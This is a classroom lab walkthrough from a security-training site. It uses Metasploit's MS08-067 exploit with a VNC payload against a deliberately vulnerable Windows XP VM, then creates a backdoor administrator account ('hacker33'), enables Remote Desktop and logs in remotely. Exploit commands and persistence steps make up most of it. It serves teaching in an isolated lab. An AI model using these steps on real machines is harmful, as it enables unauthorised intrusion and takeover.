ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Metasploit >> Current Page |Views: 19092

(Metasploit: MS08-067)

{ BackTrack5R1: Establishing A VNCShell & rdesktop to Victim Machine  }

Section 0. Background Information
  1. http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
    • The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit.
    • Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.

  2. Lab Notes
    • In this lab we will do the following:
      1. Use Metasploit to Exploit Damn Vulnerable WXP-SP2
      2. Create Attacker Account on  Damn Vulnerable WXP-SP2
      3. rdesktop to Damn Vulnerable WXP-SP2 using newly created Attacker Account.

  3. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

     

Section 1: Log into Damn Vulnerable WXP-SP2
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine

     

  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: <Provide Password>

     

  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt

     

  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.

 

Section 2: Log into BackTrack5
  1. Start Up BackTrack5R1.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  4. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  5. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.107.  In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Damn Vulnerable WXP-SP2).

     

Section 3: Starting up the Metasploit MSF Console
  1. Start Up Metasploit msfconsole
    • Instructions:
      1. Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.

     

  2. msfconsole screen
    • Note(FYI):
      • This is the msfconsole

     

  3. Search for the MS08-067 Exploit
    • Instructions:
      1. search ms08_067

     

  4. Use exploit MS08-067 Exploit
    • Instructions:
      1. use exploit/windows/smb/ms08_067_netapi

     

  5. Show Payloads
    • Instructions:
      1. show payloads

     

  6. Set Payloads
    • Instructions:
      1. set PAYLOAD windows/vncinject/bind_tcp
      2. Press <Enter>
    • Note:
      • This Payload will create a VNC Server/Shell Using TCP.

     

  7. Show Options
    • Instructions:
      1. show options
    • Note(FYI):
      • Notice the Required Column.  RPORT and SMBPIPE are already populated, but RHOST is not.
      • In the next step, you will populate RHOST with the IP Address of the victim machine (Damn Vulnerable WXP-SP2).

     

  8. Set RHOST and Verify
    • Note(FYI):
      • Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
    • Instructions:
      1. set RHOST 192.168.1.116
      2. show options
        • The Victim's IP Address is now set.

     

  9. Exploit the Victim Machine
    • Instructions:
      1. exploit
    • Note(FYI):
      • Notice that the vncinject stage was sent to the victim's IP Address.  (See Below).
      • A VNC View Session will now be established to the Victim Machine.

     

  10. Verify VNC TCP Connection
    • Instructions:
      1. netstat -nao | findstr :4444
        • In my case, 1052 is the process ID for the VNC Metasploit session.
        • In your case it will be different.
        • Use your PID with the following command.
      2. tasklist | findstr 1052

     

  11. Create New Attacker Account
    • Instructions:
      1. net user hacker33 abc123 /add
      2. net localgroup administrators hacker33 /add

     

  12. Open Control Panel
    • Instructions:
      1. Start --> Control Panel

     

  13. Open System
    • Instructions:
      1. Double Click on System

     

  14. Allow Remote Desktop
    • Instructions:
      1. Click on the Remote Tab
      2. Check Allow Remote Assistance invitations to be sent from the computer.
      3. Check Allow users to connect remotely to this computer
      4. Click OK

     

  15. Reboot Damn Vulnerable WXP-SP2
    • Instructions:
      1. shutdown /r
    • Note(FYI):
      • We are going to test the hacker33 account that we just created on Damn Vulnerable WXP-SP2.

     

  16. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  17. rdesktop to Damn Vulnerable WXP-SP2
    • Note(FYI):
      • Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
    • Instructions:
      1. Wait until Damn Vulnerable WXP-SP2 has rebooted and is at the login screen
      2. rdesktop -u hacker33 -p abc123 192.168.1.116

     

  18. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt

     

  19. Set Stronger Password
    • Instructions:
      1. net user hacker33 s0m3t41ng!
    • Notes(FYI):
      1. Or use whatever password you perfer.

     

Section 4: Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. net user hacker33
      2. date /t
        • Press enter twice.
      3. echo "Your Name"
        • This should be your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle

     

  2. Shutdown Damn Vulnerable WXP-SP2
    • Instructions:
      1. shutdown -s -c "You've Been Hacked"

     

  3. Power Off BackTrack5R1
    • Instructions:
      1. poweroff

 


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth